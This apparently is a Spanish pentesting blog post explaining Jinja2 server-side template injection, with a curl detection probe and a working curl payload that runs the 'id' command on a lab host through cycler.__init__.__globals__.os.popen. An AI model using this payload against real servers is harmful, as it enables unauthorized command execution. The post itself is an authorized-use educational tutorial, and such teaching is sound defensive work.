~ / blog / pentesting
KALI

Template injection (SSTI)

Muchos frameworks web usan plantillas para generar HTML, y si meten tu entrada sin filtrar, puedes inyectar código de plantilla que se ejecuta en el servidor.

Primero detectas el motor con una operación matemática simple entre llaves: si te devuelve el resultado, es vulnerable. Luego escalas el payload hasta ejecutar comandos del sistema.

Es un fallo devastador que convierte una plantilla en una shell.

# los comandos

kali@kali:~$ curl 'http://10.0.0.5/hi?name={{7*7}}'copiar
Hola 49 <- SSTI (Jinja2)
kali@kali:~$ curl -G 'http://10.0.0.5/hi' --data-urlencode "name={{cycler.__init__.__globals__.os.popen('id').read()}}"copiar
uid=33(www-data)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.